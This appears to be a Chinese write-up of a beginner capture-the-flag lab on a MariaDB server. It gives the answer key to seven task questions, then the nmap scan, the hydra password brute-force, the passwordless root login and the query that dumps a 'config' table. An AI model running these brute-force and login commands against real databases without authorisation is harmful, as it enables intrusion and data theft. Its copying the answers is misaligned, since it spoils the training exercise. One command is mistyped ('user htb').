答案
-
任务1:During our scan, which port do we find serving MySQL?
3306
-
任务2:What community-developed MySQL version is the target running?
MariaDB
-
任务3: When using the MySQL command line client, what switch do we need to use in order to specify a login username?
-u
-
任务4: Which username allows us to log into this MariaDB instance without providing a password?
root
-
任务5: In SQL, what symbol can we use to specify within the query that we want to display everything inside a table?
*
-
任务6: In SQL, what symbol do we need to end each query with?
;
-
任务7:There are three databases in this MySQL instance that are common across all MySQL instances. What is the name of the fourth that's unique to this host?
htb
曲折的路途
-
上Nmap扫描,执行命令
nmap -sV 目标IP, 发现有点问题,
-
修改扫描参数:
nmap -p 3306 -sC 目标IP
-
暴破一下mysql用户名和密码,执行命令:
hydra -L /usr/share/brutespray/wordlist/mysql/user -P /usr/share/brutespray/wordlist/mysql/password -t 2 -e n -f -v 目标IP mysql,发现目标使用的是空密码
3.1 本来想使用Nmap内置的脚本进行测试,发现出错,nmap -p 3306 --script=mysql-brute 目标IP
-
使用mysql-client登入,
mysql -h 目标IP -u root
-
查看所有库,
show databases;
-
查看htb库中的表
user htb; show tables;
-
查看
config表中的数据,select * from config;
撒花
